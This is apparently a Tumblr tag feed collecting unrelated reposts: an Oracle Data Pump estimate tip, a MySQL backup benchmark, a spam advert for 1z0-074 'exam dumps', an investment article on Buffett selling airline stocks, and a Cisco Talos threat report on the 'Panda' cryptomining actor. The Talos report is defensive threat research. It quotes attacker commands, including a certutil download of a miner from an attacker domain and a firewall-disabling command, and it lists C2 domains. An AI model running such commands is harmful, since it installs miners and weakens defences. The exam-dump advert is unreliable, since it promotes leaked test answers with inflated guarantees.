#oracle dump file estimate
Explore tagged Tumblr posts
ocptechnology · 4 years ago
Text
Estimate Required Disk Space for Export Using Estimate_only
In the Data Pump EXPDP command, use ESTIMATE_ONLY to estimate the disk space required for the export job without performing the actual export. Before creating the export dump it is better to check the dump size using ESTIMATE_ONLY. As an example, we are going to run a demo against the SCOTT user. EXPDP Estimate only Step 1. Check the segment size using the command below. SQL> select…
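A minimal sketch of what such an ESTIMATE_ONLY run can look like is shown below. The credentials, schema and directory object are illustrative assumptions rather than values from the truncated post above; with ESTIMATE_ONLY=YES, Data Pump prints the space estimate and exits without writing a dump file.

expdp scott/tiger DIRECTORY=data_pump_dir SCHEMAS=scott ESTIMATE_ONLY=YES ESTIMATE=BLOCKS
# or base the estimate on optimizer statistics instead of block counts:
expdp scott/tiger DIRECTORY=data_pump_dir SCHEMAS=scott ESTIMATE_ONLY=YES ESTIMATE=STATISTICS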
globalmediacampaign · 5 years ago
Text
Performance Testing Using MySQLdump and the MySQL Shell Utility
In my previous post I explained how to take a logical backup using the MySQL Shell utilities. In this post, we shall compare the speed of the backup and restoration process.

MySQL Shell Speed Test

We are going to compare the backup and recovery speed of mysqldump and the MySQL Shell utility tools. The tools below are used for the speed comparison:

mysqldump
util.dumpInstance
util.loadDump

Hardware Configuration

Two standalone servers with identical configurations.

Server 1
   * IP: 192.168.33.14
   * CPU: 2 Cores
   * RAM: 4 GB
   * DISK: 200 GB SSD

Server 2
   * IP: 192.168.33.15
   * CPU: 2 Cores
   * RAM: 4 GB
   * DISK: 200 GB SSD

Workload Preparation

On Server 1 (192.168.33.14), we have loaded approximately 10 GB of data. Now, we want to restore the data from Server 1 (192.168.33.14) to Server 2 (192.168.33.15).

MySQL Setup

MySQL Version: 8.0.22
InnoDB Buffer Pool Size: 1 GB
InnoDB Log File Size: 16 MB
Binary Logging: On

We loaded 50M records using sysbench.

[root@centos14 sysbench]# sysbench oltp_insert.lua --table-size=5000000 --num-threads=8 --rand-type=uniform --db-driver=mysql --mysql-db=sbtest --tables=10 --mysql-user=root --mysql-password=****** prepare
WARNING: --num-threads is deprecated, use --threads instead
sysbench 1.0.20 (using bundled LuaJIT 2.1.0-beta2)
Initializing worker threads...
Creating table 'sbtest3'...
Creating table 'sbtest4'...
Creating table 'sbtest7'...
Creating table 'sbtest1'...
Creating table 'sbtest2'...
Creating table 'sbtest8'...
Creating table 'sbtest5'...
Creating table 'sbtest6'...
Inserting 5000000 records into 'sbtest1'
Inserting 5000000 records into 'sbtest3'
Inserting 5000000 records into 'sbtest7'
.
.
.
Creating a secondary index on 'sbtest9'...
Creating a secondary index on 'sbtest10'...

Test Case One

In this case we are going to take a logical backup using the mysqldump command.

Example

[root@centos14 vagrant]# time /usr/bin/mysqldump --defaults-file=/etc/my.cnf --flush-privileges --hex-blob --opt --master-data=2 --single-transaction --triggers --routines --events --set-gtid-purged=OFF --all-databases | gzip -6 -c > /home/vagrant/test/mysqldump_schemaanddata.sql.gz

start_time = 2020-11-09 17:40:02
end_time   = 2020-11-09 18:00:21

It took nearly 20 minutes 19 seconds to take a dump of all databases with a total size of around 10 GB.

Test Case Two

Now let's try with the MySQL Shell utility. We are going to use dumpInstance to take a full backup.

Example

MySQL localhost:33060+ ssl JS > util.dumpInstance("/home/vagrant/production_backup", {threads: 2, ocimds: true, compatibility: ["strip_restricted_grants"]})
Acquiring global read lock
Global read lock acquired
All transactions have been started
Locking instance for backup
Global read lock has been released
Checking for compatibility with MySQL Database Service 8.0.22
NOTE: Progress information uses estimated values and may not be accurate.
Data dump for table `sbtest`.`sbtest1` will be written to 38 files
Data dump for table `sbtest`.`sbtest10` will be written to 38 files
Data dump for table `sbtest`.`sbtest3` will be written to 38 files
Data dump for table `sbtest`.`sbtest2` will be written to 38 files
Data dump for table `sbtest`.`sbtest4` will be written to 38 files
Data dump for table `sbtest`.`sbtest5` will be written to 38 files
Data dump for table `sbtest`.`sbtest6` will be written to 38 files
Data dump for table `sbtest`.`sbtest7` will be written to 38 files
Data dump for table `sbtest`.`sbtest8` will be written to 38 files
Data dump for table `sbtest`.`sbtest9` will be written to 38 files
2 thds dumping - 36% (17.74M rows / ~48.14M rows), 570.93K rows/s, 111.78 MB/s uncompressed, 50.32 MB/s compressed
1 thds dumping - 100% (50.00M rows / ~48.14M rows), 587.61K rows/s, 115.04 MB/s uncompressed, 51.79 MB/s compressed
Duration: 00:01:27s
Schemas dumped: 3
Tables dumped: 10
Uncompressed data size: 9.78 GB
Compressed data size: 4.41 GB
Compression ratio: 2.2
Rows written: 50000000
Bytes written: 4.41 GB
Average uncompressed throughput: 111.86 MB/s
Average compressed throughput: 50.44 MB/s

It took a total of 1 minute 27 seconds to take a dump of the entire database (the same data as used for mysqldump), and it also shows its progress, which is really helpful for knowing how much of the backup has completed. It also reports the time it took to perform the backup.

The parallelism depends on the number of cores in the server. Simply increasing the value won't be helpful in my case. (My machine has 2 cores.)

Restoration Speed Test

In the restoration part, we are going to restore the mysqldump backup on another standalone server. The backup file was already moved to the destination server using rsync.

Test Case 1

Example

[root@centos15 vagrant]# time gunzip < /mnt/mysqldump_schemaanddata.sql.gz | mysql -u root -p

It took around 16 minutes 26 seconds to restore the 10 GB of data.

Test Case 2

In this case we are using the MySQL Shell utility to load the backup file on another standalone host. We already moved the backup file to the destination server. Let's start the restoration process.

Example

MySQL localhost:33060+ ssl JS > util.loadDump("/home/vagrant/production_backup", {progressFile: "/home/vagrant/production_backup/log.json", threads: 2})
Opening dump...
Target is MySQL 8.0.22. Dump was produced from MySQL 8.0.22
Checking for pre-existing objects...
Executing common preamble SQL
Executing DDL script for schema `cluster_control`
Executing DDL script for schema `proxydemo`
Executing DDL script for schema `sbtest`
.
.
.
2 thds loading 1% (150.66 MB / 9.78 GB), 6.74 MB/s, 4 / 10 tables done
2 thds loading / 100% (9.79 GB / 9.79 GB), 1.29 MB/s, 10 / 10 tables done
[Worker001] sbtest@sbtest8@@37.tsv.zst: Records: 131614 Deleted: 0 Skipped: 0 Warnings: 0
[Worker002] sbtest@sbtest10@@37.tsv.zst: Records: 131614 Deleted: 0 Skipped: 0 Warnings: 0
Executing common postamble SQL
380 chunks (50.00M rows, 9.79 GB) for 10 tables in 2 schemas were loaded in 40 min 6 sec (avg throughput 4.06 MB/s)

It took around 40 minutes 6 seconds to restore the 10 GB of data.

Now let's try disabling the redo log and starting the data import using the MySQL Shell utility.

mysql> alter instance disable innodb redo_log;
Query OK, 0 rows affected (0.00 sec)

MySQL localhost:33060+ ssl JS > util.loadDump("/home/vagrant/production_backup", {progressFile: "/home/vagrant/production_backup/log.json", threads: 2})
Opening dump...
Target is MySQL 8.0.22.
Dump was produced from MySQL 8.0.22
Checking for pre-existing objects...
Executing common preamble SQL
.
.
.
380 chunks (50.00M rows, 9.79 GB) for 10 tables in 3 schemas were loaded in 19 min 56 sec (avg throughput 8.19 MB/s)
0 warnings were reported during the load.

After disabling the redo log, the average throughput increased by up to 2x.

Note: Do not disable redo logging on a production system. It allows shutdown and restart of the server while redo logging is disabled, but an unexpected server stoppage while redo logging is disabled can cause data loss and instance corruption.

Physical Backups

As you may have noticed, the logical backup methods, even if multithreaded, are quite time consuming even for the small data set we tested them against. This is one of the reasons why ClusterControl provides a physical backup method that is based on copying the files - in that case we are not limited by the SQL layer that processes the logical backup, but rather by hardware - how fast the disk can read the files and how fast the network can transfer data between the database node and the backup server.

ClusterControl comes with different ways to implement physical backups; which method is available will depend on the cluster type and sometimes even the vendor. Let's take a look at Xtrabackup executed by ClusterControl, which will create a full backup of the data in our test environment. We are going to create an ad-hoc backup this time, but ClusterControl lets you create a full backup schedule as well.

Here we pick the backup method (xtrabackup) as well as the host we are going to take the backup from. We can also store it locally on the node, or it can be streamed to a ClusterControl instance. Additionally, you can upload the backup to the cloud (AWS, Google Cloud and Azure are supported).

The backup took around 10 minutes to complete. Here are the logs from the cmon_backup.metadata file.

[root@centos14 BACKUP-9]# cat cmon_backup.metadata
{
    "class_name": "CmonBackupRecord",
    "backup_host": "192.168.33.14",
    "backup_tool_version": "2.4.21",
    "compressed": true,
    "created": "2020-11-17T23:37:15.000Z",
    "created_by": "",
    "db_vendor": "oracle",
    "description": "",
    "encrypted": false,
    "encryption_md5": "",
    "finished": "2020-11-17T23:47:47.681Z"
}

Now let's try the same restore using ClusterControl.

ClusterControl > Backup > Restore Backup

Here we pick the restore backup option; it supports time-based and log-based recovery too. Then we choose the backup file source path and the destination server. You also have to make sure this host can be reached from the ClusterControl node using SSH. We don't want ClusterControl to set up software, so we disabled that option. After restoration it will keep the server running.

It took around 4 minutes 18 seconds to restore the 10 GB of data. Xtrabackup does not lock your database during the backup process. For large databases (100+ GB), it provides much better restoration time compared to the mysqldump/shell utility. ClusterControl also supports partial backup and restoration, as one of my colleagues explained in his blog: Partial backup and restore.

Conclusion

Each method has its own pros and cons. As we have seen, there is not one method that works best for everything you need to do. We need to choose our tool based on our production environment and target time for recovery.

Tags: MySQL database performance backup management restore

https://severalnines.com/database-blog/performance-testing-using-mysqldump-and-mysql-shell-utility
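For reference, a rough sketch of the kind of Percona XtraBackup commands such a physical backup boils down to is shown below; ClusterControl drives this for you, and the credentials and target directory here are illustrative assumptions, not values from the test environment above.

# Take a full physical backup of the running server (credentials/paths are placeholders)
xtrabackup --backup --user=root --password=****** --target-dir=/data/backups/full
# Apply the redo log so the backup is consistent and ready to restore
xtrabackup --prepare --target-dir=/data/backups/full
# On the destination server, with MySQL stopped and an empty datadir, copy the files back
xtrabackup --copy-back --target-dir=/data/backups/full
chown -R mysql:mysql /var/lib/mysql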
hellojessicairi-blog · 6 years ago
Text
Finalize Your Success By Preparing Your Exam With 1z0-074 Exam Dumps...
It is a must for any IT student to take help from result-bearing study material. With this in mind, RealExamDumps has put together 1z0-074 Exam Dumps with the efforts of qualified experts. Any student who is willing to pass the Oracle 1z0-074 Exam can make this attempt with guaranteed success. This compact study material contains apposite details about each exam topic. When you read through the 1z0-074 Questions And Answers, you gain knowledge about each relevant corner of the IT field. When you download this low-priced guide, you also get a money-back guarantee that secures your payment and brings satisfaction. A bundle of services is provided to you on this platform, which can be appreciated after reading the following description.
Direct Way To Success
When you prepare from this short guide, you will never question the usefulness of the 1z0-074 Study Material. You will get all the required material in a well-presented manner and will be able to easily memorize the syllabus. Your success is assured here under the guidance of highly qualified experts.
A Free Of Cost Trial
You don't need to pay anything unless you are satisfied with the quality of the 1z0-074 Practice Test. A free PDF file of demo questions is available for interested students to help them make a decision. This free version will adequately show you how this short study guide is going to help you out.
Compact 1z0-074 Questions And Answers
You should seek help from this series of PDF questions and answers, which will make you able to perform exceptionally in the final exam. You will even be able to predict your success after reading this smart study material. Every effort has been made to present the information the way it will be tested in the final exam.
Apprenticeship Under Experts
What else could you wish for if you get expert guidance for your preparation from a valid and result-bearing study guide like 1z0-074 Dumps? The experts will give you training according to the exam requirements so that you can produce the best possible grades. And, no doubt, for the preparation of an IT exam, guidance matters a lot.
Scheduled Study Plan With Guarantee
Here you work according to a study plan that finalizes your success. It shows the confidence of the experts that you get a money-back guarantee for the 1z0-074 Practice Questions. When you study according to the scheme laid down by veterans, success meets you at the end. If you do not succeed while working according to the directions of the experts, you are eligible to claim your money back. There is no chance of failure unless you are negligent, and our study plan will keep you active.
Revision Through Exam Simulator
Though it is enough to go through the 1z0-074 Study Guide, the Online Practice Test will help you fly higher. You will definitely improve with the practice test, which works like an exam simulator. It has been designed on the model of the final exam to make you familiar with the final exam style.
Simple And Quick Download
It's simple to buy the 1z0-074 Dumps PDF from RealExamDumps. Once you are satisfied with the free demo questions and answers, it is a matter of a few clicks to download the original PDF study file. If you have any further questions about our services, you can contact us at [email protected] around the clock. Now your success is waiting for you at a little distance, and you can touch your dreams by availing our services right now. Don't forget to download our free demo questions.
valuentumbrian · 5 years ago
Text
Never Been More Bullish Even as Buffett Dumps Airlines
Image Source: IATA. Data Source: McKinsey & Company (IATA). Airlines haven’t been able to earn their estimated cost of capital for as long as we can remember. There have been hundreds of airline bankruptcies since deregulation in 1978.
By Brian Nelson, CFA
On Saturday, May 2, Berkshire Hathaway (BRK.A, BRK.B) reported expectedly weak first-quarter results. We won’t be ditching Berkshire Hathaway’s stock in the Best Ideas Newsletter portfolio so long as Uncle Warren is at the helm, but there were a couple takeaways from the report that we want you to be aware of (we’ll have another more extensive note focusing more exclusively on Berkshire coming out soon).
The first big piece of news, something that should not be surprising to any reader of our work, is that Buffett sold his stakes in the airlines. We’ve already talked extensively about how the Oracle made a mistake in owning the airlines in the first place in Value Trap and in the following article, “Buffett Makes Another ‘Unforced Error’ in Airlines,” and we’re not reading anything at all (not on the economy, not on the equity markets) into his decision to unload shares.
Despite their oligopolistic structure, airlines do not have “moats” and arguably have decrepit economic castles. A company is generally considered a “moaty” enterprise if its ROIC, or return on invested capital, consistently exceeds its WACC (ROIC-WACC = economic profit) and is expected to continue to do so, as a result of a benign industry structure and impenetrable competitive advantages. Consistent economic profits have never happened for airlines. Airlines have always been terrible long-term investments.
According to the IATA, for example, industry-wide ROIC averaged a mere 6.7% during the 5-year period 2014-2018, well below the group's estimated cost of capital (see image at top of this article), a period that coincides with one of the most prosperous economic environments ever witnessed across the globe. There have been hundreds of airline bankruptcies since deregulation in 1978, too, and there hasn't been one instance where the airline industry's ROIC has exceeded its WACC in more than 20 years (even when oil prices collapsed in 2015/2016, ROIC still came up short).
Image Source: American Airlines’ 10-K, released February 2019. A flu pandemic is a documented risk factor in airline regulatory filings.
Though COVID-19 was an unexpected catalyst, so were SARS, 9/11, the oil price shocks and the Iraq war. While COVID-19 may look like it came out of left field, when it comes to the airline business, these types of shocks are part of their operations (a flu pandemic is even a documented risk factor in their regulatory filings, see image above, as illustrative), and therefore not extraordinary or even anywhere close to being considered a black swan. Massive buybacks by airlines in recent years are simply unforgivable, as many executives even used the bankruptcy process to optimize their operations during the past few decades. They knew they were rolling the dice in a bad business.
“Let them fail,” we said more recently, and here’s what we said about what to expect from airlines in Value Trap, released December 2018:
Buffett said once that he had an 800 number that he would call anytime that he wanted to buy an airline stock again. Maybe that number has been disconnected after all these years, as Berkshire Hathaway is once again an owner of airline equities. Though the structural characteristics of an industry can and do change over time, I’m very skeptical the airline business has changed permanently for the better. Today’s airline business may be more oligopolistic in nature and much more profitable thanks to consolidation and the right-sizing of capacity, but it retains a notoriously cyclical passenger-demand profile, ties to the level and volatility of energy resource prices, considerable operating leverage, all the while barriers to entry remain low, exit barriers remain high, and fare pressure endures. The next downturn may not see as many bankruptcies as prior economic cycles due to lower unit-cost profiles, but it may turn out to only be modestly “less bad” for equity holders.
Warren Buffett ditched airlines because he knows they are terrible investments and just made a mistake, while prudently reducing exposure to the aerospace/airline industry because Berkshire also owns metal-bender Precision Castparts, one of our favorite companies that makes metal castings for jet engines. Boeing’s (BA) massive debt raise has been a material positive for the aerospace supply chain, including Precision Castparts, but the ill-health of Boeing’s airline customer base will mean commercial aerospace demand will also remain subdued for some time. We told you to stay away from Boeing a long time ago, “Boeing’s Fall from Grace.”
Image (March 21, 2020): Boeing was added to the Dividend Growth Newsletter portfolio January 27, 2017, and removed March 16, 2018, prior to the unfortunate accidents that have claimed the lives of hundreds of people. We warned readers to stay far away from Boeing's stock days before its huge collapse.
Today, we remain unequivocally bullish on equities for the long run. This is somewhat of a change during the past week or so. As with Professor Siegel, we do not expect markets to come anywhere close to a retest of the March 23 lows. While it is now much more difficult to call near-term direction than it was at the top in February or when dollar-cost averaging near the bottom on March 23, we've never been more bullish on the long term, "Staying Focused on the Long Term," as we fully expect moral hazard advice (indexing) to not only continue to be supported via bailouts and stimulus, but actually be rewarded, a key lesson following any financial crisis.
Image Source: The final lesson to learn from financial crises. Value Trap: Theory of Universal Valuation.
The Treasury is expected to borrow ~$3 trillion during the current quarter, a tally that is nearly 6 times as much as the nearest record quarter of July-September 2008 during the depths of the Great Financial Crisis. The Fed plans to start buying ETFs this month, and Apple (AAPL) is borrowing 10-year debt at incredibly low rates of just 1.65%. Enter 1.65% as the discount rate in a DCF model. The bias is to the upside! The world also now has several ‘shots on goal’ for a new coronavirus vaccine with drug companies scaling up production even as any possible vaccine remains in early trials.
Concluding Thoughts
Warren Buffett wrote his now-famous op-ed to the New York Times on October 16, 2008, and this is what you need to know:
Over the long term, the stock market news will be good. In the 20th century, the United States endured two world wars and other traumatic and expensive military conflicts; the Depression; a dozen or so recessions and financial panics; oil shocks; a flu epidemic; and the resignation of a disgraced president. Yet the Dow rose from 66 to 11,497.
The news may be scary in coming months, and market volatility may elevate again, but we’ve never been more bullish on the longer run. The biggest advantage of an individual investor is something called time horizon arbitrage. As many professionals continue to fear a break below the March 23 lows in the near term, we’re focused on how this market absorbs the tremendous and unprecedented stimulus in the coming months and what that means for nominal equity prices in the longer run.
It may not happen this month or this year, but we expect lift off as investors race to preserve purchasing power! Our favorite ideas for a portfolio setting remain in the Best Ideas Newsletter portfolio, Dividend Growth Newsletter portfolio, and High Yield Dividend Newsletter portfolio. Our favorite brand new ideas, released each month, are included in the Exclusive publication.
Facebook (FB), PayPal (PYPL), Visa (V), and Alphabet (GOOG) remain among our favorites, in particular.
-----
Aerospace & Defense - Prime: BA, FLIR, GD, LMT, NOC, RTX
Aerospace Suppliers: ATRO, HEI, HXL, SPR, TDY, TXT
Insurance: ACE, AFL, AIG, AJG, Y, AFG, ACGL, AIZ, AXS, BRK.B, LFC, CINF, CNA, CNO, RE, ERIE, FAF, GNW, HCC, LNC, L, MFC, MBI, MCY, MET, MKL, NAVG, PRE, PRA, PL, PRU, RGA, RLI, RNR, SIGI, SFG, STFC, SLF, ALL, CB, HIG, PGR, TRV, TMK, UNM, WTM
Pharmaceuticals - Big: ABBV, ABT, AMGN, AZN, BMY, GSK, LLY, MRK, NVO, NVS, PFE, SNY
Pharmaceuticals - Biotech/Generic: ALXN, AGN, BIIB, BMRN, GILD, MYL, REGN, TEVA, VRX, VRTX, ZTS
Airline Related: AAL, ALK, DAL, HA, JBLU, LUV, SAVE, UAL
Biotech Related (vaccine/treatment): MRNA, INO, NVAX, BNTX, APDN, VXRT, TNXP, EBS, PFE, JNJ, DVAX, IMV, IBIO, REGN, SNY, GSK, ABBV, TAK, HTBX, SNGX, PDSB
Treasury Related: TLT, TBT, IEF, SHY, IEI, EDV, TMV, TMF, VGLT, SHV, BIL, VGSH
Other: XAR, IBB, JETS, SPY, DIA, QQQ
---
Valuentum members have access to our 16-page stock reports, Valuentum Buying Index ratings, Dividend Cushion ratios, fair value estimates and ranges, dividend reports and more. Not a member? Subscribe today. The first 14 days are free.
Brian Nelson owns shares in SPY and SCHG. Some of the other securities written about in this article may be included in Valuentum's simulated newsletter portfolios. Contact Valuentum for more information about its editorial policies.
terabitweb · 6 years ago
Text
Original Post from Talos Security Author:
By Christopher Evans and David Liebenberg.
Executive summary
A new threat actor named “Panda” has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we’ve ever seen, but it still has been one of the most active attackers we’ve seen in Cisco Talos threat trap data. Panda’s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.
Panda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.
Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread “MassMiner” campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns.
First sightings of the not-so-elusive Panda
We first observed this actor in July of 2018 exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner that was associated with a campaign called “MassMiner” through the wallet, infrastructure, and post-exploit PowerShell commands used.
Panda used masscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638). They used PowerShell post-exploit to download a miner payload called “downloader.exe,” saving it in the TEMP folder under a simple number filename such as “13.exe” and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000.
By October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times.
The sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block.
One of Panda’s C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name “Panda.”
Bulehero connection
Around the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called “download.exe” from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as “13.exe” and execute it. The file server turned out to be an instance of HFS hosting four malicious files.
Running the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining.
Additionally, the sample attempts to shut down the victim’s firewall with commands such as “cmd /c net stop MpsSvc”. The malware also modifies the access control list to grant full access to certain files by running cacls.exe.
For example:
cmd /c schtasks /create /sc minute /mo 1 /tn “Netframework” /ru system /tr “cmd /c echo Y|cacls C:\Windows\appveif.exe /p everyone:F
Both of these behaviors have also been observed in previous MassMiner infections.
The malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine’s IP address and location in Chinese. This behavior was also observed in the MassMiner campaign.
Additionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the “Shadow Brokers” exploits and were installed in a suspiciously named directory: “WindowsInfusedAppeEternalblue139specials”.
Evolution of Panda
In January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China.
Panda used this vulnerability to both directly download a file called “download.exe” from a46[.]bulehero[.]in and upload a simple PHP web shell to the path “/public/hydra.php”, which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to “/public/hydra.php”. Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda’s attempt to move laterally within compromised organizations.
In March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in.
At the time, the actor’s tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called “download.exe” from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. ‘C:/Windows/temp/autzipmfvidixxr7407.exe’. This file then downloads a Monero mining trojan named “wercplshost.exe” from fid[.]hognoob[.]se as well as a configuration file called “cfg.ini” from uio[.]hognoob[.]se, which provides configuration details for the miner.
“Wercplshost.exe” contains exploit modules designed for lateral movement, many of which are related to the “Shadow Brokers” exploits, and engages in SMB brute-forcing. The sample acquires the victim’s internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim’s Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords.
Soon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: “certutil.exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe”. The coinminer is also run using the command “cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\[filename].exe”.
The updated payload still includes exploit modules designed for lateral movement, many of which are related to the “Shadow Brokers” exploits. One departure, however, is previously observed samples acquire the victim’s internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim’s Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to “Scant.txt” (note the typo). The sample also writes a list of hardcoded IP ranges to “ip.txt” and passes it to Masscan to scan for port 445 and saves the results to “results.txt.” This is potentially intended to find machines vulnerable to MS17-010, given the actor’s history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords
In June, Panda began targeting a newer WebLogic vulnerability, CVE-2019-2725, but their TTPs remained the same.
Recent activity
Panda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of “a” – “z” characters and the last five consisting of digits (e.g., “xblzcdsafdmqslz19595.exe”). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se.
Besides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda’s usual lateral movement modules that include Shadow Brokers’ exploits and Mimikatz.
One difference is that several samples contained a Gh0st RAT default mutex “DOWNLOAD_SHELL_MUTEX_NAME” with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda’s earlier behavior.
On August 19, 2019, we observed that Panda had added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as “BBBBB”, instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18.
In line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to “oo[.]mygoodluck[.]best:51888:WervPoxySvc”, and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club.
Cisco Threat Grid’s analysis also showed artifacts associated with Panda’s typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best.
Conclusion
Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated.
However, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold.
Panda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and are quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations.
COVERAGE
For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.
Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
IOCs
Domains
a45[.]bulehero[.]in
a46[.]bulehero[.]in
a47[.]bulehero[.]in
a48[.]bulehero[.]in
a88[.]bulehero[.]in
a88[.]heroherohero[.]info
a[.]bulehero[.]in
aic[.]fxxxxxxk[.]me
axx[.]bulehero[.]in
b[.]bulehero[.]in
bulehero[.]in
c[.]bulehero[.]in
cb[.]fuckingmy[.]life
cnm[.]idc3389[.]top
down[.]idc3389[.]top
fid[.]hognoob[.]se
fxxk[.]noilwut0vv[.]club
haq[.]hognoob[.]se
idc3389[.]top
idc3389[.]cc
idc3389[.]pw
li[.]bulehero2019[.]club
list[.]idc3389[.]top
mi[.]oops[.]best
mx[.]oops[.]best
nrs[.]hognoob[.]se
oo[.]mygoodluck[.]best
